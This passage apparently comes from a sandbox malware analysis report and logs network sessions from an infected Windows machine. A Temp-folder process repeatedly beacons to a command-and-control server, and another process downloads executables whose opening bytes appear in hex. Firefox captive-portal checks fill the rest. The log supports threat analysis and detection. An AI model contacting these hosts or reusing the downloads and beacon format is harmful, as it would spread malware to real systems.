21	192.168.2.4	50029	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:50.334264994 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 5, 2024 18:46:51.240534067 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50044	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:53.093055010 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 18:46:54.000132084 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	60469	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:55.720387936 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 5, 2024 18:46:56.650909901 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	60483	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:58.606002092 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 18:46:59.506527901 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	60485	185.215.113.16	80	7244	C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:59.343257904 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 5, 2024 18:47:00.259792089 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:47:00 GMT Content-Type: application/octet-stream Content-Length: 2095616 Last-Modified: Tue, 05 Nov 2024 16:58:03 GMT Connection: keep-alive ETag: "672a4e9b-1ffa00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 50 71 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 71 00 00 04 00 00 8a bc 20 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,Pq@q @P.d. p.v@.rsrc .@.idata .@ P).@kwdkpzgxPWJ@juauvnci@q@.taggant0Pq"@
Nov 5, 2024 18:47:00.259802103 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:47:00.259912968 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:47:00.259919882 CET	12	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:47:00.259937048 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:47:00.259947062 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:47:00.259957075 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ,v}qs~63?
Nov 5, 2024 18:47:00.259965897 CET	212	IN	Data Raw: a6 2e 38 46 81 e7 60 d8 a8 eb 3b 58 02 4c 09 5a 24 95 a4 b3 08 00 ce 6d cb b2 42 67 75 89 61 71 0e 25 1f 16 b7 13 29 a8 a1 e9 32 8f 92 2c 30 d9 b7 ae fd 91 60 a9 d9 71 eb 2e 56 0c 9e 97 fd 37 cb 08 f2 9f b0 18 22 e1 79 1c fd 39 dd 48 f1 9f f1 0c Data Ascii: .8F`;XLZ$mBguaq%)2,0`q.V7"y9H\ya4M/M\oDDMDp#3W`.j=OwJezU$bq'!FSZv^N*SDS(i
Nov 5, 2024 18:47:00.259974957 CET	1236	IN	Data Raw: e2 aa fe e5 e8 c4 02 d2 c6 3e 0a 1e 89 5e 83 c2 e9 07 32 16 8f 11 a2 32 7c 98 ce 5d 4a c1 59 71 77 27 75 45 ca d2 21 ea f6 df 78 e5 ca e4 12 d2 f7 71 38 45 b9 8c 4b 44 a5 98 74 55 02 67 d4 78 6e c8 36 85 a5 26 ce 94 fe 18 af a2 ba 3d b7 d0 9c 61 Data Ascii: >^22\|]JYqw'uE!xq8EKDtUgxn6&=aDD)b$E0>1RiG8gYB8/{$D9>VwF5%}1"Dtlpo%XY22iQ/B=YZo&8g\d1314~
Nov 5, 2024 18:47:00.259985924 CET	1236	IN	Data Raw: a1 c2 b1 49 9e 15 33 a3 12 18 54 b7 ef 5e 38 93 d4 04 5c 5c 18 0e c1 c5 b0 23 d9 5d 01 74 d0 a9 4a 10 3b da c2 66 24 81 10 20 a4 91 b3 6c 8e 57 08 44 f1 4d ff d8 bc 82 c9 1c 55 5a 4a d4 24 7a 42 68 1b 53 50 fe fd e1 0e 15 5d 85 f7 3e d1 30 d9 c4 Data Ascii: I3T^8\\#]tJ;f$ lWDMUZJ$zBhSP]>08I@DQ{PD1zL<^$1vDyXzQH1;Zq)u"7h1\&4}1Z!+;+pBwD$;@
Nov 5, 2024 18:47:00.264695883 CET	1236	IN	Data Raw: be 6b 2a 5a ca e0 d1 19 b5 4f 59 99 9e 15 03 32 ea 7f b3 61 3e 13 19 46 88 15 ab ac 43 43 09 8c 4e 04 f9 a8 f7 ad 7a 21 d9 68 69 9f 2e 1f 65 4f 1a e0 a5 70 1e 15 4a 98 f8 63 09 c6 96 7d 77 39 e7 05 ad 8d ff 0f 0f 33 87 4e 14 6a 8a 15 d1 9f 03 f5 Data Ascii: kZOY2a>FCCNz!hi.eOpJc}w93Nj2l 82.8S?)jzu)<u)}5"fyV1\o1YlZa9_DX3C X21QLKVns$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	60501	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:47:01.042973042 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 5, 2024 18:47:01.966569901 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:47:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	60509	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:47:03.624927998 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 18:47:04.539843082 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:47:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	60511	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:47:03.823350906 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 5, 2024 18:47:04.754241943 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:47:04 GMT Content-Type: application/octet-stream Content-Length: 3235328 Last-Modified: Tue, 05 Nov 2024 16:58:11 GMT Connection: keep-alive ETag: "672a4ea3-315e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 70 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfp1@11@WkP1O1 @.rsrc@.idata @dwzjxvhv**@mmbykldk`161@.taggant0p1"<1@
Nov 5, 2024 18:47:04.754353046 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:47:04.754616976 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:47:04.754630089 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:47:04.754643917 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:47:04.754657984 CET	1236	IN	Data Raw: 9c 75 a6 f0 53 ea a8 e8 6e ea 73 9b 9a 13 e2 70 02 35 eb e8 8e e5 d0 12 c6 91 96 7a c5 a9 0e df 9c 75 a6 f0 73 ea a8 e8 6e ea 73 9b 9a 13 b2 70 42 35 eb e8 8e cd d0 12 c6 91 76 7a c5 a9 0e 7f 9b 75 a6 f0 13 ea a8 e8 6e ea 73 9b 9a 13 b2 70 52 35 Data Ascii: uSnsp5zusnspB5vzunspR5Vzu3nsp5U6z?unsp4Qz_unsp*4{unsp>4y{unsp24
Nov 5, 2024 18:47:04.754681110 CET	848	IN	Data Raw: 8e 55 d2 12 c6 91 d6 77 c5 a9 0e 1f ed 75 a6 f0 b3 ef a8 e8 6e ea 73 9b 9a 13 aa 70 76 37 eb e8 8e 8d d8 12 c6 91 b6 77 c5 a9 0e bf ed 75 a6 f0 53 ef a8 e8 6e ea 73 9b 9a 13 b2 70 4e 37 eb e8 8e a5 d8 12 c6 91 96 77 c5 a9 0e df ed 75 a6 f0 73 ef Data Ascii: Uwunspv7wuSnspN7wusnsp^7vwunspV7Vwu3nsp7-6w?unsp7w_unsp7pu
Nov 5, 2024 18:47:04.754693985 CET	1236	IN	Data Raw: 73 e2 a8 e8 6e ea 73 9b 9a 13 aa 70 d6 31 eb e8 8e 45 d9 12 c6 91 76 72 c5 a9 0e 7f e3 75 a6 f0 13 e2 a8 e8 6e ea 73 9b 9a 13 e6 70 2e 31 eb e8 8e ed d4 12 c6 91 56 72 c5 a9 0e 9f e3 75 a6 f0 33 e2 a8 e8 6e ea 73 9b 9a 13 ae 70 6a 31 eb e8 8e 75 Data Ascii: snsp1Evrunsp.1Vru3nspj1u6r?unsp~1r_unsp1-sunsp1sunsp0EsuSnsp05
Nov 5, 2024 18:47:04.754704952 CET	1236	IN	Data Raw: c6 91 b6 0f c5 a9 0e bf f5 75 a6 f0 53 e7 a8 e8 6e ea 73 9b 9a 13 be 70 8e 3d eb e8 8e 9d da 12 c6 91 96 0f c5 a9 0e df f5 75 a6 f0 73 e7 a8 e8 6e ea 73 9b 9a 13 ae 70 92 3d eb e8 8e 75 d3 12 c6 91 76 0f c5 a9 0e 7f f4 75 a6 f0 13 e7 a8 e8 6e ea Data Ascii: uSnsp=usnsp=uvunsp==Vu3ns3s6ssp=unsp<unss
Nov 5, 2024 18:47:04.754718065 CET	1236	IN	Data Raw: 9a 04 31 fb 43 9d b3 5b 19 a5 8f 3d c7 ae a6 77 c2 a9 ec e8 5a 74 9a 1f fe 11 bc ed c7 fd 73 9b 9a 04 31 fb 10 32 97 d8 10 e9 34 11 c2 79 6d d1 53 b4 eb e8 61 be 7c ef 5c 74 ae 6d 86 b5 f6 f0 fa ba a9 e8 44 f5 af 91 c0 25 ac 13 c6 32 6c 09 69 eb Data Ascii: 1C[=wZts124ymSa\|\tmD%2lisss124ymSa\|\tmD2lisssm2[wc2Hc2UfssZfrss1COI402
Nov 5, 2024 18:47:04.770359993 CET	1236	IN	Data Raw: 01 ad a7 e8 c7 a9 f6 e9 71 bd 31 99 c7 24 ae f0 1d ac a6 e8 5b 04 92 6c cc b9 18 37 5b 7c 7e 2d 5b e8 28 e5 c6 b9 a6 e8 75 b9 31 16 ca 2a 68 cc 3c e8 2a af ca 2a 9e c8 70 55 f8 1f fe fe 53 ee c7 2a 6a d7 80 b7 3e d1 02 a9 31 91 5b 7c 9a 73 5d bc Data Ascii: q1$[l7[\|~-[(u1h<pUSj>1[\|s][ss12f[4ymSa\|ZwTtm10\wW1>iss12f[4ymSa\|Zw"Ttm10\w

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	60519	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:47:05.150480032 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 5, 2024 18:47:05.748836994 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 21:54:06 GMT Age: 71579 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	60530	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:47:05.765161037 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 5, 2024 18:47:06.374087095 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Tue, 05 Nov 2024 00:16:26 GMT Age: 63040 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	60533	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:47:05.864252090 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 5, 2024 18:47:06.463306904 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 21:54:06 GMT Age: 71580 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 5, 2024 18:47:06.847919941 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 5, 2024 18:47:06.973464966 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 21:54:06 GMT Age: 71580 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 5, 2024 18:47:07.107914925 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 5, 2024 18:47:07.233087063 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 21:54:06 GMT Age: 71581 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 5, 2024 18:47:07.763906002 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 5, 2024 18:47:07.889539003 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 21:54:06 GMT Age: 71581 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
